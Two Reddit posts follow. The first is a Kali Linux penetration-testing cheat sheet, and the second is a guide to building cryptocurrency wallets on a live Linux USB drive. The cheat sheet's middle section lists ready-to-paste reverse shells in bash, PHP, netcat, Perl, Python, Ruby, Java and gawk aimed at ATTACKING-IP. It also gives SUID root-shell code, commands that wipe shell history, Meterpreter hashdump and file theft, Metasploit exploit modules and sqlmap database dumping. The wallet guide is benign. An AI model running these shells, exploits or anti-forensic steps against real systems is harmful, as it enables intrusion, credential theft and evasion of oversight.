history - Show bash history, commands the user has entered previously.
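The PATH line above is easy to verify locally. This minimal sketch (using a hypothetical /tmp/path-demo directory) adds a directory to PATH and then runs a script from it by bare name:

```shell
# Create a demo directory containing a small executable script
mkdir -p /tmp/path-demo
printf '#!/bin/sh\necho hello-from-demo\n' > /tmp/path-demo/hello-demo
chmod +x /tmp/path-demo/hello-demo

# Append the directory to PATH (affects the current shell only)
PATH="$PATH:/tmp/path-demo"

# The script now resolves by bare name, no ./ prefix needed
hello-demo    # prints: hello-from-demo
```

This is also why a writable directory early in a privileged user's PATH is a classic escalation vector.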

Redhat / CentOS / RPM Based Distros

cat /etc/redhat-release - Shows Redhat / CentOS version number.
rpm -qa - List all installed RPM's on an RPM based Linux distro.
rpm -q --changelog openvpn - Check installed RPM is patched against CVE, grep the output for CVE.

YUM Commands

Package manager used by RPM based systems; you can pull some useful information about installed packages and / or install additional tools.

yum update - Update all RPM packages with YUM, also shows whats out of date.
yum update httpd - Update individual packages, in this example HTTPD (Apache).
yum install package - Install a package using YUM.
yum --exclude=package kernel* update - Exclude a package from being updated with YUM.
yum remove package - Remove package with YUM.
yum erase package - Remove package with YUM.
yum list package - Lists info about yum package.
yum provides httpd - Shows what a package provides, e.g. Apache HTTPD Server.
yum info httpd - Shows package info, architecture, version etc.
yum localinstall blah.rpm - Use YUM to install local RPM, settles deps from repo.
yum deplist package - Shows deps for a package.
yum list installed | more - List all installed packages.
yum grouplist | more - Show all YUM groups.
yum groupinstall 'Development Tools' - Install YUM group.

Debian / Ubuntu / .deb Based Distros

cat /etc/debian_version - Shows Debian version number.
cat /etc/*-release - Shows Ubuntu version number.
dpkg -l - List all installed packages on Debian / .deb based Linux distro.

Linux User Management
useradd new-user - Creates a new Linux user.
passwd username - Reset Linux user password, enter just passwd if you are root.
deluser username - Remove a Linux user.

Linux Decompression Commands

How to extract various archives (tar, zip, gzip, bzip2 etc) on Linux and some other tricks for searching inside of archives etc.

unzip archive.zip - Extracts zip file on Linux.
zipgrep "blah" archive.zip - Search inside a .zip archive.
tar xf archive.tar - Extract tar file Linux.
tar xvzf archive.tar.gz - Extract a tar.gz file Linux.
tar xjf archive.tar.bz2 - Extract a tar.bz2 file Linux.
tar ztvf file.tar.gz | grep blah - Search inside a tar.gz file.
gzip -d archive.gz - Extract a gzip file Linux.
zcat archive.gz - Read a gz file Linux without decompressing.
zless archive.gz - Same function as the less command for .gz archives.
zgrep 'blah' /var/log/maillog*.gz - Search inside .gz archives on Linux, search inside of compressed log files.
vim file.txt.gz - Use vim to read .txt.gz files (my personal favorite).
upx -9 -o output.exe input.exe - UPX compress .exe file Linux.

Linux Compression Commands

zip -r dir - Creates a .zip file on Linux.
tar cf archive.tar files - Creates a tar file on Linux.
tar czf archive.tar.gz files - Creates a tar.gz file on Linux.
tar cjf archive.tar.bz2 files - Creates a tar.bz2 file on Linux.
gzip file - Creates a file.gz file on Linux.
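The create / extract pair above can be sanity-checked with a quick round trip. A minimal sketch, using throwaway paths under /tmp:

```shell
# Create some sample data, archive it, then extract into a separate dir
mkdir -p /tmp/tar-demo/extracted
cd /tmp/tar-demo
echo "sample data" > file1.txt

tar czf archive.tar.gz file1.txt        # create the .tar.gz
tar xzf archive.tar.gz -C extracted     # extract into ./extracted

cat extracted/file1.txt                 # prints: sample data
```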

Linux File Commands

du -sh blah - Display size of file / dir Linux.
diff file1 file2 - Compare / Show differences between two files on Linux.
md5sum file - Generate MD5SUM Linux.
md5sum -c blah.iso.md5 - Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
file blah - Find out the type of file on Linux, also displays if file is 32 or 64 bit.
dos2unix file.txt - Convert Windows line endings to Unix / Linux.
base64 < input-file > output-file - Base64 encodes input file and outputs a Base64 encoded file called output-file.
base64 -d < input-file > output-file - Base64 decodes input file and outputs a Base64 decoded file called output-file.
touch -r ref-file new-file - Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
rm -rf dir - Remove files and directories without prompting for confirmation.
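The base64 pair above is a simple round trip; this sketch (throwaway files in /tmp) encodes a file, decodes it back, and diffs the result:

```shell
# Round-trip: Base64 encode a file, decode it back, and compare
echo "secret config" > /tmp/b64-in.txt
base64 < /tmp/b64-in.txt > /tmp/b64-enc.txt
base64 -d < /tmp/b64-enc.txt > /tmp/b64-out.txt

# diff exits 0 (no output) when the round trip is lossless
diff /tmp/b64-in.txt /tmp/b64-out.txt && echo "round trip OK"
```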

Samba Commands

Connect to a Samba share from Linux.

$ smbmount //server/share /mnt/win -o user=username,password=password1
$ smbclient -U user \\server\share
$ mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

Breaking Out of Limited Shells

Credit to G0tmi1k for these (or wherever he stole them from!).

The Python trick:

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

Misc Commands

init 6 - Reboot Linux from the command line.
gcc -o output input.c - Compile C code.
gcc -m32 -o output input.c - Cross compile C code, compile 32 bit binary on 64 bit Linux.
unset HISTFILE - Disable bash history logging.
rdesktop X.X.X.X - Connect to RDP server from Linux.
kill -9 $$ - Kill current session.
chown user:group blah - Change owner of file or dir.
chown -R user:group blah - Change owner of file or dir and all underlying files / dirs - recursive chown.
chmod 600 file - Change file / dir permissions, see Linux File System Permissions for details.
cat /dev/null > ~/.bash_history - Clear bash history (run on the target, e.g. within an SSH session).

Linux File System Permissions

777 rwxrwxrwx No restriction, global RWX, any user can do anything.
755 rwxr-xr-x Owner has full access, others can read and execute the file.
700 rwx------ Owner has full access, no one else has access.
666 rw-rw-rw- All users can read and write but not execute.
644 rw-r--r-- Owner can read and write, everyone else can read.
600 rw------- Owner can read and write, everyone else has no access.
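The octal modes in the table map directly onto chmod; this sketch applies one of them to a throwaway file and reads the mode back with GNU stat:

```shell
# Apply a mode from the table and read it back
touch /tmp/perm-demo
chmod 600 /tmp/perm-demo

# %a = octal mode, %A = symbolic mode (GNU stat)
stat -c '%a %A' /tmp/perm-demo    # prints: 600 -rw-------
```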

Linux File System

/ - also known as "slash" or the root.
/bin - Common programs, shared by the system, the system administrator and the users.
/boot - Boot files, boot loader (grub), kernels, vmlinuz
/dev - Contains references to system devices, files with special properties.
/etc - Important system config files.
/home - Home directories for system users.
/lib - Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found - Files that were saved during failures are here.
/mnt - Standard mount point for external file systems.
/media - Mount point for external file systems (on some distros).
/net - Standard mount point for entire remote file systems - nfs.
/opt - Typically contains extra and third party software.
/proc - A virtual file system containing information about system resources.
/root - root user's home dir.
/sbin - Programs for use by the system and the system administrator.
/tmp - Temporary space for use by the system, cleaned upon reboot.
/usr - Programs, libraries, documentation etc. for all user-related programs.
/var - Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler. Web servers, Databases etc.

Linux Interesting Files / Dirs

Places that are worth a look if you are attempting to privilege escalate / perform post exploitation.

Directory Description

/etc/passwd - Contains local Linux users.
/etc/shadow - Contains local account password hashes.
/etc/group - Contains local account groups.
/etc/init.d/ - Contains service init scripts - worth a look to see what's installed.
/etc/hostname - System hostname.
/etc/network/interfaces - Network interfaces.
/etc/resolv.conf - System DNS servers.
/etc/profile - System environment variables.
~/.ssh/ - SSH keys.
~/.bash_history - Users bash history log.
/var/log/ - Linux system log files are typically stored here.
/var/adm/ - UNIX system log files are typically stored here.
/var/log/apache2/access.log & /var/log/httpd/access.log - Apache access log file typical path.
/etc/fstab - File system mounts.

Compiling Exploits

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.
process.h, string.h, winbase.h, windows.h, winsock2.h - Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h - Linux exploit code

Build Exploit GCC

gcc -o exploit exploit.c - Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

gcc -m32 exploit.c -o exploit - Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe - Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser; you can update the UID / GID and shell as required.

Below are some quick copy and paste examples for various shells:

SUID C Shell for /bin/bash

int main(void){ setresuid(0, 0, 0); system("/bin/bash"); }

SUID C Shell for /bin/sh

int main(void){ setresuid(0, 0, 0); system("/bin/sh"); }

Building the SUID Shell binary

gcc -o suid suid.c
gcc -m32 -o suid suid.c - for 32bit
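After building, the setuid bit still has to be set on the binary. This sketch uses a throwaway /tmp file as a stand-in for the compiled suid binary just to show the mode bits (note the kernel only honors setuid on real binaries, not interpreted scripts):

```shell
# Stand-in file for the compiled suid binary above
printf '#!/bin/sh\nexit 0\n' > /tmp/suid-demo

# The leading 4 in the octal mode sets the setuid bit: 4755 = rwsr-xr-x
chmod 4755 /tmp/suid-demo

stat -c '%a %A' /tmp/suid-demo    # prints: 4755 -rwsr-xr-x
# For a root shell the binary must also be owned by root (chown root:root),
# which itself requires root privileges.
```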

Setup Listening Netcat

Your remote shell will need a listening netcat instance in order to connect back.

Set your Netcat listening shell on an allowed port

Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443.

To set up a listening netcat instance, enter the following:

root@kali:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 80 ...

NAT requires a port forward

If your attacking machine is behind a NAT router, you'll need to set up a port forward to the attacking machine's IP / port.

ATTACKING-IP is the machine running your listening netcat session; port 80 is used in all examples below (for reasons mentioned above).

Bash Reverse Shells

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done


while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

PHP Reverse Shell

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' (Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)
Netcat Reverse Shell
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0</tmp/p | /bin/sh >/tmp/p 2>&1

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/sh >/tmp/p 2>&1
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Remember to listen on 443 on the attacking machine also.

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby Reverse Shell

ruby -rsocket -e 'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk Reverse Shell

#!/usr/bin/gawk -f

BEGIN {
    Port = 8080
    Prompt = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}

Kali Web Shells

The following shells exist within Kali Linux, under /usr/share/webshells/ - these are only useful if you are able to upload, inject or transfer the shell to the machine.

Kali PHP Web Shells

/usr/share/webshells/php/php-reverse-shell.php - Pen Test Monkey - PHP Reverse Shell
/usr/share/webshells/php/findsock.c - Pen Test Monkey, Findsock Shell. Build with gcc -o findsock findsock.c (be mindful of the target server's architecture), execute with netcat, not a browser: nc -v target 80
/usr/share/webshells/php/simple-backdoor.php - PHP backdoor, useful for CMD execution if upload / code injection is possible.
/usr/share/webshells/php/php-backdoor.php - Larger PHP shell, with a text input box for command execution.

Tip: Executing Reverse Shells

The last two shells above are not reverse shells, however they can be useful for executing a reverse shell.

Kali Perl Reverse Shell

/usr/share/webshells/perl/ - Pen Test Monkey - Perl Reverse Shell
/usr/share/webshells/perl/perlcmd.cgi - Pen Test Monkey, Perl Shell. Usage: pass the command to run in the query string, e.g. perlcmd.cgi?cat /etc/passwd

Kali Cold Fusion Shell

/usr/share/webshells/cfm/cfexec.cfm - Cold Fusion Shell - aka CFM Shell

Kali ASP Shell

/usr/share/webshells/asp/ - Kali ASP Shells

Kali ASPX Shells

/usr/share/webshells/aspx/ - Kali ASPX Shells

Kali JSP Reverse Shell

/usr/share/webshells/jsp/jsp-reverse.jsp - Kali JSP Reverse Shell

TTY Shells

Tips / tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick - python -c 'import pty;pty.spawn("/bin/bash")' or echo os.system('/bin/bash')
Spawn Interactive sh shell - /bin/sh -i
Spawn Perl TTY Shell - perl -e 'exec "/bin/sh";'
Spawn Ruby TTY Shell - ruby -e 'exec "/bin/sh"'
Spawn Lua TTY Shell - os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi: - :!bash
Spawn TTY Shell from NMAP interactive mode - !sh

SSH Port Forwarding

ssh -L 9999:192.168.1.X:445 user@192.168.1.1 - Port 9999 locally is forwarded to port 445 on 192.168.1.X through host 192.168.1.1

SSH Port Forwarding with Proxychains

ssh -D 127.0.0.1:9050 user@192.168.1.X - Dynamically allows all port forwards to the subnets available on the target.

Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp - Windows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp set ViewOnly false - Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp - Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

upload file c:\windows - Meterpreter upload file to Windows target
download c:\windows\repair\sam /tmp - Meterpreter download file from Windows target
execute -f c:\windows\temp\exploit.exe - Meterpreter run .exe on target - handy for executing uploaded exploits
execute -f cmd -c - Creates new channel with cmd shell
ps - Meterpreter show processes
shell - Meterpreter get shell on the target
getsystem - Meterpreter attempts privilege escalation on the target
hashdump - Meterpreter attempts to dump the hashes on the target
portfwd add -l 3389 -p 3389 -r target - Meterpreter create port forward to target machine
portfwd delete -l 3389 -p 3389 -r target - Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

use exploit/windows/smb/ms08_067_netapi - MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi - MS06_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index - MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac - Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxiliary Metasploit Modules

use auxiliary/scanner/http/dir_scanner - Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan - Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login - Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version - Metasploit MySQL Version Scanner
use auxiliary/scanner/oracle/oracle_login - Metasploit Oracle Login Module

Metasploit Powershell Modules

use exploit/multi/script/web_delivery - Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell - Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer - Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload - Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

run post/windows/gather/win_privs - Metasploit show privileges of current user
use post/windows/gather/credentials/gpp - Metasploit grab GPP saved passwords
load mimikatz -> wdigest - Metasploit load Mimikatz
run post/windows/gather/local_admin_search_enum - Identify other machines that the supplied domain user has administrative access to

CISCO IOS Commands

A collection of useful Cisco IOS commands.

enable - Enters enable mode
conf t - Short for, configure terminal
(config)# interface fa0/0 - Configure FastEthernet 0/0
(config-if)# ip addr 192.168.1.X 255.255.255.0 - Add ip to fa0/0
(config)# line vty 0 4 - Configure vty lines
(config-line)# login - Cisco set telnet password
(config-line)# password YOUR-PASSWORD - Set telnet password

show running-config - Show running config loaded in memory

show startup-config - Show startup config

show version - show cisco IOS version

show session - display open sessions

show ip interface - Show network interfaces

show interface e0 - Show detailed interface info

show ip route - Show routes

show access-lists - Show access lists

dir file systems - Show available files

dir all-filesystems - File information

dir /all - Show deleted files

terminal length 0 - No limit on terminal output

copy running-config tftp - Copies running config to tftp server

copy running-config startup-config - Copy running-config to startup-config


Hash Lengths

MD5 Hash Length - 16 Bytes
SHA-1 Hash Length - 20 Bytes
SHA-256 Hash Length - 32 Bytes
SHA-512 Hash Length - 64 Bytes
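The byte lengths above can be checked locally: each digest tool prints hex (2 characters per byte), so the byte length is the hex length divided by 2.

```shell
# Hash the empty string with each tool and report the digest size
for tool in md5sum sha1sum sha256sum sha512sum; do
  hex=$(printf '' | "$tool" | cut -d' ' -f1)
  echo "$tool: ${#hex} hex chars = $(( ${#hex} / 2 )) bytes"
done
# md5sum: 32 hex chars = 16 bytes ... sha512sum: 128 hex chars = 64 bytes
```

Recognising these lengths is a quick way to guess what hash type you've dumped before throwing it at JTR.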

SQLMap Examples

sqlmap -u TARGET-URL --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 - Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php" - Targeted sqlmap scan
sqlmap -u TARGET-URL --dbms=mysql --tech=U --random-agent --dump - Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap -o -u TARGET-URL --forms - sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump - sqlmap dump and crack hashes for table users on database-name
submitted by LubuntuFU to Kalilinux

Build your wallets on a flash drive with a live Linux OS

You will need to customize your build to suit your needs, but I picked wallets of the major currencies. For example I picked jaxx because it provides anonymous addresses for multiple currencies that can be used to move funds and accept funds without giving personal details. I attempted to provide reliable source information but make no claims to the security of any of these applications. Be sure to research the tools used in your build. This is just a good framework for building a portable wallet with "pretty good security". It provides a means to build portable wallets, hardware wallets, and back up your build to DVD for loss prevention, with everything, backups included, being password protected and encrypted.
Install a debian type distribution to a flash drive. 8GB will work, but 32GB or 64GB will provide some additional space to work with. These instructions will work for Debian, Ubuntu, Mint, or any other related distribution.
The installation instructions are easy to follow, but during the installation phase I would recommend configuring grub to install to the flash drive rather than the main drive of the computer during the creation of the partitions. Also, encrypt your home folder to prevent casual browsing of the files with some other operating system.
Detailed instructions for your version of linux can be found easily by searching for "install linux version to flash drive."
Install Debian
Install Mint
Install Ubuntu
Applications and app images can be installed to your home folder and those contents will be protected from observation if the drive is lost.

Your system can also be protected from loss with Pinguy Builder.

If you are careful about what is installed it is easy to build a wallet that will fit on a DVD. Keep the fat down to a minimum and a backup can be built with Pinguy Builder.
Pinguy Builder is currently hosted on SourceForge. Head over to the following URL and download the latest Pinguy Builder version.
Download Pinguy Builder
First install the Gdebi package. Gdebi will take care of all necessary dependencies while installing software.
$ sudo apt-get install gdebi
Go to the download location, and then install Pinguy Builder as shown below.
$ sudo gdebi pinguybuilder_4.3-6_all-beta.deb

CryptoCurrency Linux Build

Install wget

$ sudo apt-get install wget

Install GDBI Package Manager

$ sudo apt-get install gdebi
$ sudo dpkg -i FileName.deb
$ sudo apt-get install -f

Install github fuse (Runs github AppImages)

$ sudo apt-get install fuse
$ sudo modprobe fuse
$ sudo groupadd fuse
$ sudo usermod -a -G fuse $USER

Install Curl

$ sudo apt-get install curl

Install Browsers

Remove Firefox / Thunderbird

$ sudo apt remove firefox
$ sudo apt remove thunderbird

Add Chromium Browser

Chromium is a good choice because it supports the tor, jaxx, metamask, and ledger nano extensions. This makes the wallets and apps easily supported between devices and operating systems.
$ sudo apt install -y chromium-browser
If you need Flash, run the following commands.
$ sudo apt install -y pepperflashplugin-nonfree
$ sudo update-pepperflashplugin-nonfree --install
I typically configure chromium to open in incognito mode by editing the application's .desktop entry.
You have to change one line in the chromium-browser.desktop file. The best is to do that locally:
Copy the file from /usr/share/applications to /home/yourname/.local/share/applications
Open the file with gedit (open gedit and drag the local desktop file on to the gedit window)
Find the first line in the file that begins with Exec=
Replace the line by Exec=chromium-browser --incognito
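The four steps above can also be done non-interactively with sed instead of gedit. A sketch, with a printf fallback (a minimal hypothetical .desktop file) in case the system-wide entry isn't present:

```shell
# Work on a local copy so the system-wide entry stays untouched
APPS="$HOME/.local/share/applications"
mkdir -p "$APPS"
cp /usr/share/applications/chromium-browser.desktop "$APPS/" 2>/dev/null || \
  printf '[Desktop Entry]\nName=Chromium\nExec=chromium-browser %%U\n' > "$APPS/chromium-browser.desktop"

# Rewrite the Exec= line(s) to always launch incognito
sed -i 's|^Exec=.*|Exec=chromium-browser --incognito|' "$APPS/chromium-browser.desktop"

grep '^Exec=' "$APPS/chromium-browser.desktop"   # shows the rewritten Exec line(s)
```

Entries in ~/.local/share/applications override the system-wide ones for your user.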


An additional browser may be helpful for non-crypto related browsing. I currently like the Brave browser or the Tor browser.
For AMD64: $ wget -O brave.deb
$ sudo dpkg -i ./brave.deb
$ sudo apt-get install -f

Install TOR

$ sudo apt install tor
Start the service:
$ sudo /etc/init.d/tor start
Verify Service
$ ps aux|grep tor
$ systemctl status tor
Start TOR Service on Boot
$ sudo update-rc.d tor enable

Tor Browser

$ sudo add-apt-repository ppa:webupd8team/tor-browser
$ sudo apt-get update
$ sudo apt-get install tor-browser

Install hashrat

Install hashrat to verify checksums.
$ sudo apt-get install hashrat
Use man page for details
$ man hashrat
Verify the checksums of all software downloaded from reputable sources with hashrat; see the man page for syntax.
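If hashrat isn't available, coreutils sha256sum does the same job. A sketch with a hypothetical release file in /tmp:

```shell
# Generate a checksum file, then verify the download against it
echo "release tarball contents" > /tmp/release.tar.gz
sha256sum /tmp/release.tar.gz > /tmp/release.tar.gz.sha256

# -c re-hashes the file and compares against the recorded sum
sha256sum -c /tmp/release.tar.gz.sha256    # prints: /tmp/release.tar.gz: OK
```

In practice you would compare against the .sha256 file published by the project, not one you generated yourself.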

Communications Programs

Installing standalone Signal Desktop

Download the repository's key and install it into the system
$ curl -s | sudo apt-key add -
$ sudo add-apt-repository "deb [arch=amd64] xenial main"
$ sudo apt update
$ sudo apt install signal-desktop

Install Telegram

$ sudo add-apt-repository ppa:atareao/telegram
$ sudo apt-get update
$ sudo apt-get install telegram


Install JAXX Wallet -

This can be done as an app image or as a chromium extension
Copy jaxx-1.3.15-x86_64.AppImage to ~/Documents/wallets
Jaxx requires Ubuntu 12.04, Fedora 21, or Debian 8 (or later)
$ sha1sum jaxx-1.3.15-x86_64.AppImage
$ chmod +x jaxx-1.3.15-x86_64.AppImage
$ ./jaxx-1.3.15-x86_64.AppImage

Install Ledger Nano S
Download Ledger Live
On most Linux systems, USB devices are mapped with read-only permissions by default. To open a device through this API, your user will need to have write access to it too. A simple solution is to set a udev rule. Create a file /etc/udev/rules.d/50-yourdevicename.rules with the following content:
SUBSYSTEM=="usb", ATTR{idVendor}=="[yourdevicevendor]", MODE="0664", GROUP="plugdev"
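The rule file can be staged and checked before touching /etc. A sketch (the filename and vendor ID placeholders are from the text above, not real values):

```shell
# Stage the rule in /tmp first to sanity-check its contents
# (the real file belongs in /etc/udev/rules.d/ and writing there needs root)
cat > /tmp/50-yourdevicename.rules <<'EOF'
SUBSYSTEM=="usb", ATTR{idVendor}=="[yourdevicevendor]", MODE="0664", GROUP="plugdev"
EOF

cat /tmp/50-yourdevicename.rules
# After copying it into /etc/udev/rules.d/, reload the rules:
#   sudo udevadm control --reload-rules && sudo udevadm trigger
```

Your user also needs to be in the plugdev group for the GROUP="plugdev" grant to help.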
$ sudo wget -q -O - | sudo bash
If the system won't update the UDEV rules with the file, copy the UDEV directory to /etc/udev/. Run nautilus as root:
$ sudo nautilus
Use the File Explorer to copy the UDEV directory to /etc/udev/

Install Ledger Chrome Extentions

Install Ledger Wallet - Ripple

Execute the installation in /home/username/Documents/Wallet
$ sudo dpkg -i ledger_wallet_ripple_linux_x64_1.0.3.deb
$ sudo apt-get install -f

Install Ledger Wallet - NEO

Neon also provides software wallets for neo and nep-5 tokens
Download the .deb file for Ubuntu. Once downloaded...
.deb file install:
$ sudo dpkg -i Neon_0.2.4_amd64.Linux.deb
$ sudo apt-get install -f

AppImage file install (expected sha256sum: ed1011f895b145a43bf65f9b288755848445391d680ce33f9860e990c84fdde8):
$ sha256sum Neon-0.2.2-x86_64.Linux.AppImage
$ chmod +x Neon-0.2.2-x86_64.Linux.AppImage
$ ./Neon-0.2.2-x86_64.Linux.AppImage

Install Monero

Before proceeding with the compilation, the following packages are required:

update Ubuntu's repository

$ sudo apt update
Install dependencies to be able to compile Monero
$ sudo apt install build-essential cmake libboost-all-dev miniupnpc libunbound-dev graphviz doxygen libunwind8-dev pkg-config libssl-dev libcurl4-openssl-dev libgtest-dev libreadline-dev libminiupnpc-dev libzmq3-dev
Monero Official Download Links
Windows, 64-bit
macOS, 64-bit
Linux, 64-bit
Note: for these examples I'm using the file monero-linux-x64-v0.12.0.0.tar.bz2. Replace this file name with the current release file name.
$tar xjf monero-linux-x64-v0.12.0.0.tar.bz2
How you compile a program from a source
  1. open a console
  2. use the command cd to navigate to the correct folder. If there is a README file with installation instructions, use that instead.
  3. extract the files with one of the following commands: if it's a .tar.gz use tar xvzf PACKAGENAME.tar.gz; if it's a .tar.bz2 use tar xvjf PACKAGENAME.tar.bz2
./configure
make
sudo make install
github Download Site
Check hashes:
$ hashrat -sha256 monero-gui-linux-x64-v0.12.0.0.tar.bz2
$ hashrat -sha256 monero-linux-x64-v0.12.0.0.tar.bz2
Move the Monero applications to /Documents/wallet/monero/ or /usr/share/bin/ or wherever you decide to install applications.

Compilation - This will take some research to do properly. I recommend downloading the tar file, check the hash against the SHA256 and make the file executable. But for those that want to compile from source here are my notes. I have done it, but it is involved and not a rookie task.

$ cd / (Change Directory to Root)
$ sudo mkdir -p /build/release/bin/
$ cp /home/dillinger/Downloads/monero-gui-linux-x64-v0.12.0.0.tar.bz2 /build/release/bin/
$ cd /build/release/bin/

download the latest Monero source code from github

$ sudo git clone --recursive

From inside /build/release/bin/ check the directory with ls to verify the directory /monero/ in the directory /build/release/bin/

Compile the release version with make (or make -j number_of_threads, e.g. make -j 2):
$ cd monero
$ sudo make

go into monero folder

$ cd monero/
$ cd /
$ sudo mkdir -p /opt/monero
$ sudo mv -v ./build/release/bin/monero/* /opt/monero/
$ cd /opt/monero/

Alternatively, make release can be used instead of make. This compiles the source code without compiling unique tests, which is faster and can avoid problems if there are compilation errors with compiling the tests.

Installation: after successful compilation, the Monero binaries should be located in ./build/release/bin. I usually move the binaries into the /opt/monero/ folder, as done above.


This should result in:
/opt/monero/
├── monero-blockchain-export
├── monero-blockchain-import
├── monerod
└── monero-wallet-cli

Now we can start the Monero daemon, i.e., monerod, and let it download the blockchain and synchronize itself with the Monero network. After that, you can run the monero-wallet-cli.

launch the Monero daemon and let it synchronize with the Monero network

$ /opt/monero/monerod

launch the Monero wallet

$ /opt/monero/monero-wallet-cli

Useful aliases (with rlwrap): monerod and monero-wallet-cli do not have tab-completion or history. This problem can be overcome using rlwrap.
Alternate Information and Source /

install rlwrap

$ sudo apt install rlwrap

download monerod and monero-wallet-cli commands files

wget -O ~/.bitmonero/monerocommands_simplewallet.txt
Use a remote node to avoid the size of the Monero blockchain
Connecting to the node from the GUI wallet: after you enter your password for your wallet, you will see a pop up that will give you the option to "use custom settings". Click on it. You will then be sent to the "Settings" page in the GUI. At this point you should see two text boxes to the right of a label that says "Daemon address". In the first box (the one to the left) you need to enter the address of the node that you want to connect to; it could be a hostname or any old IP address. The smaller box to the right is where you enter the node's port. The default port is 18081, but if you are using a random node the port that is used will vary; some public nodes use 18089.

Customize Desktop

Edit Log In Image
$ sudo apt install lightdm-gtk-greeter-settings
$ pkexec lightdm-gtk-greeter-settings
Edit Grub Settings
$ sudo gedit /etc/default/grub
$ sudo update-grub
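As a sketch of what is typically edited in /etc/default/grub (the values here are illustrative assumptions, not recommendations):

```shell
# Excerpt of /etc/default/grub -- example values only.
GRUB_TIMEOUT=2                                # seconds the boot menu is shown
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"     # kernel parameters for normal boots
GRUB_BACKGROUND="/boot/grub/background.png"   # custom menu background (assumed path)
```

After saving, run sudo update-grub so the changes are written into the generated grub.cfg.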

This article is provided by u/blackfootradio at cryptotux

submitted by blackfootradio to CryptoTux [link] [comments]

